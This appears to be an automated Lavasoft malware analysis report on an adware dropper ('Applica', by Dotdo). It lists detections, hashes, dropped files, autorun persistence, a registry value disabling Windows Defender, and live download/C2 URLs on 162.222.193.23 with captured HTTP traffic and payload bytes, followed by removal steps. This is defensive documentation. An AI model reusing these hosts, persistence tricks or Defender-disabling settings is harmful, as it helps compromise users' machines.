Dropped.Application.Generic.1683936_4e6248e067

by malwarelabrobot on February 8th, 2018 in Malware Descriptions.

Dropped:Application.Generic.1681992 (BitDefender), not-a-virus:HEUR:AdWare.MSIL.Dotdo.gen (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Adware.Dotdo.93 (DrWeb), Dropped:Application.Generic.1681992 (B) (Emsisoft), Artemis!4E6248E06725 (McAfee), Trojan.Gen.2 (Symantec), PUA.Dotdo (Ikarus), Gen:Variant.Zusy.213000 (FSecure), Win32:Dropper-gen [Drp] (AVG), Win32:Dropper-gen [Drp] (Avast), TROJ_GE.57975A9C (TrendMicro), Dropped:Application.Generic.1683936 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 4e6248e0672534641d4d9a358d90fbe5
SHA1: 0438a66395cfd8efbbf5cd8c0e7af31182bed8e1
SHA256: dc0910d32985e4d79f289d991b14d16d57a38ef6307490664030c09cc380961b
SSDeep: 3072:GgXdZt9P6D3XJXCIwBItOdoewR3kHhhDfrsHXTXQh1:Ge340vCOdVwsxfrsHXTAh1
Size: 144912 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Firseria
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Dropped creates the following process(es):

setupok.exe:3392
%original file name%.exe:2572
ddnow.exe:1304
ddnow.exe:3904
ddnow.exe:3836
ddnow.exe:2648
ddnow.exe:3512
ddnow.exe:2688
ddnow.exe:2952
ddnow.exe:3176
tinstall.exe:2604

The Dropped injects its code into the following process(es):

applica.exe:3732

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setupok.exe:3392 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Program Files%\applica\applica.exe (12 bytes)
%Program Files%\applica\key.ini (0 bytes)
%Program Files%\applica\uninstall.exe (1030 bytes)

The Dropped deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsjDD17.tmp (0 bytes)

The process %original file name%.exe:2572 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiCDEB.tmp\SimpleFC.dll (5469 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)

The Dropped deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\6525587.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nstCDDB.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiCDEB.tmp (0 bytes)

The process ddnow.exe:1304 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)

The process ddnow.exe:3904 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)

The process ddnow.exe:3836 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)

The process ddnow.exe:2648 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)

The process ddnow.exe:3512 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (12 bytes)

The process ddnow.exe:2688 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)

The process ddnow.exe:2952 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)

The process ddnow.exe:3176 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe (61 bytes)

The process tinstall.exe:2604 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)

The Dropped deletes the following file(s):

C:\Windows\System32\Tasks\Adobe Flash Player Updater (0 bytes)
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore (0 bytes)
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA (0 bytes)

Registry activity

The process setupok.exe:3392 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"DisplayName" = "Applica"

"Publisher" = "Dotdo"

[HKLM\SOFTWARE\idot]
"idot" = "ok"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"UninstallString" = "%Program Files%\Applica\uninstall.exe"

To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"

The process %original file name%.exe:2572 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"

The process ddnow.exe:3512 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"ConsoleTracingMask" = "4294901760"

The process tinstall.exe:2604 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"

Dropped PE files

MD5 File path
d38543fc9ae37d188a23e06ee11d3504 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiCDEB.tmp\SimpleFC.dll
c5dbd61013cf8146a00f826baee93072 c:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe
a3d027a0f8a46f9adb96ab598d02e494 c:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe
662c45356fcc64b55f8938e284d0c0d0 c:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe
113d1d7b8a9039e6e63034284e35cc99 c:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe
7df9a3a1e913d4a0a444bd49eadf1458 c:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe
3a808170b41d2c9a4a434632ea4376ab c:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe
6df14af0f2ce3a7db0b21cc265564a3e c:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 94208 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 286720 2536 2560 3.13045 8c712c343be341f0c008fe547f2adcd2

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 374
2ad305eb2625cacef55c0e012e3162da
0f736b3d7de8cc164dea5634bcb7266e
51b4912377cf021eee46051c451223a1
dba1c73f07041e08af1a355d1cf786fa
f6d49c798a7c30fb247cc95eda3a38dc
91bdedda93fb2d692bd4d8e9f56569fc
7ff84ddcbefae6aaf02e7cbc01aae551
82863183d11ab2bfe0f6faa52285b2fb
128283c6409872a9bcf36393efc23574
fcb90cafcd0dab0b3348d2a3a4d6a957
0322fd7cfcadaf0dc896d876c9df1233
1f25c7afbefbf33feab279e0b69de312
cd1f5ed10e882f7d8a0c5f967fd45b75
84a0834aa3cf86d0e03cb339f1acfd86
acf71053f845d276d7acfc233fd3cb6f
f17d83f93c68a4057a7d562626fab745
2171ff59892413c65994b6335007fb76
59c258e3888d0b4c02040dd649f60018
1f3d33e118bbeef358807c43a9ff02bf
6fae0efc37d2fbae20229d8ad9fea2d6
a9a691d86babf412bff5063a916d813c
db34845a89a44e13403497c06916949e
834f9a1ad76269c7a2f255b664a93f7a
4f810ac44ebcf38b781f6ffec908b30e
30dd59ea6b89831b1efb9ddd8cdf7c4b

URLs

URL IP
hxxp://162.222.193.23/soid1.php?p=&aaaip=581324
hxxp://162.222.193.23/goet1.php?p=&pid=&all=&dotnet=yes
hxxp://162.222.193.23/run1.php?a=flash&b=111
hxxp://162.222.193.23/setup200.exe
hxxp://162.222.193.23/run1.php?a=flash&b=rand
hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61865
hxxp://162.222.193.23/run1.php?a=flash&b=setupok.exe - 61865 - 1
www.rosalesscholarly.pw 141.8.226.58


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /run1.php?a=flash&b=rand HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




a

HTTP/1.1 200 OK


Date: Wed, 07 Feb 2018 15:33:20 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
.....



POST /goet1.php?p=&pid=&all=&dotnet=yes HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 83
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




;ah4op54qtob;0-$fire-ATSpywaregot--L$cgot-c:\4e6248e0672534641d4d9a358
d90fbe5.exe;0

HTTP/1.1 200 OK


Date: Wed, 07 Feb 2018 15:32:51 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html



POST /run1.php?a=flash&b=setupok.exe - 61865 - 1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




a

HTTP/1.1 200 OK


Date: Wed, 07 Feb 2018 15:33:40 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
.....



POST /run1.php?a=flash&b=setupok.exe - 61865 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




a

HTTP/1.1 200 OK


Date: Wed, 07 Feb 2018 15:33:34 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
.....



POST /soid1.php?p=&aaaip=581324 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




aa

HTTP/1.1 200 OK


Date: Wed, 07 Feb 2018 15:32:50 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 12
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
/soi51.p9p?p..



POST /run1.php?a=flash&b=rand HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




a

HTTP/1.1 200 OK


Date: Wed, 07 Feb 2018 15:33:11 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
.....



POST /setup200.exe HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




;

HTTP/1.1 200 OK


Date: Wed, 07 Feb 2018 15:33:07 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Description: File Transfer
Content-Disposition: attachment; filename=
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 61865
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
......................................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@..@.data...X\......
.....v..............@....ndata...................................rsrc.
...............z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
.h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@
..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u
....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..
Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


POST /run1.php?a=flash&b=111 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.193.23
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




a

HTTP/1.1 200 OK


Date: Wed, 07 Feb 2018 15:32:56 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
.....







The Dropped connects to the servers at the folowing location(s):







%original file name%.exe_2572:




.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe "hXXp://162.222.193.23/newc4nT.php" "OK" "C:\Users\"%CurrentUserName%"\AppData\Local\icka6525587.txt"
rs\"%CurrentUserName%"\AppData\Local\run1.txt"
4641d4d9a358d90fbe5.exe;0" "6525587.txt"
C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe
.tmp\SimpleFC.dll
SID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32
\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiCDEB.tmp\SimpleFC.dll
> ?'?6?=?[?
8 8$8(8,808
7%7/767~7
5!5%5)5-51555
KWindows
HNetCfg.FwMgr
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
GetCPInfo
gdi32.dll
SimpleFC.dll
AddPort
EnableDisablePort
IsPortAdded
IsPortEnabled
RemovePort
? ?'?6?=?_?
>6<%<-<7
hWEB
..bYc
C:\Users\"%CurrentUserName%"\AppData\Local\icka6525587.txt
icka6525587.txt
3_0_0_185.ocx
LASH3~1.OCX
rs\"%CurrentUserName%"\AppData\Local\setupok.exe
e6248e0672534641d4d9a358d90fbe5.exe
\Windows\system32\Macromed\Flash\Flash32_23_0_0_185.ocx
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Local
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nstCDDB.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiCDEB.tmp
Windows
setupok.exe - 61865 - 1
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
-Operation f
Eigenschaft %s existiert nicht.
OLE-Fehler %.8xBDie Methode '%s' wird vom Automatisierungsobjekt nicht unterst
ge ($0%x)3Komponente mit der Bezeichnung %s existiert bereits/In der Stringliste sind Duplikate nicht erlaubt#Datei %s kann nicht erstellt werden#Datei %s kann nicht ge
ffnet werden(''%s'' ist kein g
pft (%d)#Zu viele Eintr
ge in der Liste (%d)*Listenindex
berschreitet das Maximum (%d)BExpandieren des Speicher-Stream wegen Speichermangel nicht m
glich Fehler beim Lesen von %s%s%s: %s
%s.Seek nicht implementiert
r '%s' nicht gefunden&%s kann nicht zu %s zugewiesen werden
Klasse %s nicht gefunden
%s (%s, Zeile %d)
Abstrakter FehlerBZugriffsverletzung bei Adresse %p in Modul '%s'. %s von Adresse %p
Systemfehler. Code: %d.
%s:Ein Aufruf einer Betriebssystemfunktion ist fehlgeschlagen
ltige Variant-Operation#Ung
ltige Variant-Operation ($%.8x)
Variant ist kein ArrayBVariante des Typs (%s) konnte nicht in Typ (%s) konvertiert werdenF
berlauf bei der Konvertierung einer Variante vom Typ (%s) in Typ (%s)
ltiger Variant-Typ Operation wird nicht unterst
Externe Exception %x$Auswertung von assert fehlgeschlagen
ltige Zeigeroperation
ltige Typumwandlung4Zugriffsverletzung bei Adresse %p. %s von Adresse %p
Privilegierte Anweisung(Exception %s in Modul %s bei %p.
Anwendungsfehler7Format '%s' ung
r Format '%s'(Variant-Methodenaufruf nicht unterst
"'%s' ist kein g
ltiger Integerwert"'%s' ist kein g
E/A-Fehler %d
ltige Gleitkommaoperation
lash\Flash32_23_0_0_185.ocx






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    setupok.exe:3392
    %original file name%.exe:2572
    ddnow.exe:1304
    ddnow.exe:3904
    ddnow.exe:3836
    ddnow.exe:2648
    ddnow.exe:3512
    ddnow.exe:2688
    ddnow.exe:2952
    ddnow.exe:3176
    tinstall.exe:2604
    

    2. 

  2. Delete the original Dropped file.
    3. 

  3. Delete or disinfect the following files created/modified by the Dropped:
    

    %Program Files%\applica\applica.exe (12 bytes)
    %Program Files%\applica\key.ini (0 bytes)
    %Program Files%\applica\uninstall.exe (1030 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\dnow.exe (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\dnow4.exe (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiCDEB.tmp\SimpleFC.dll (5469 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\run1.txt (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\setupok.exe (61 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Applica" = "%Program Files%\applica\applica.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Applica" = "%Program Files%\applica\applica.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2024 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now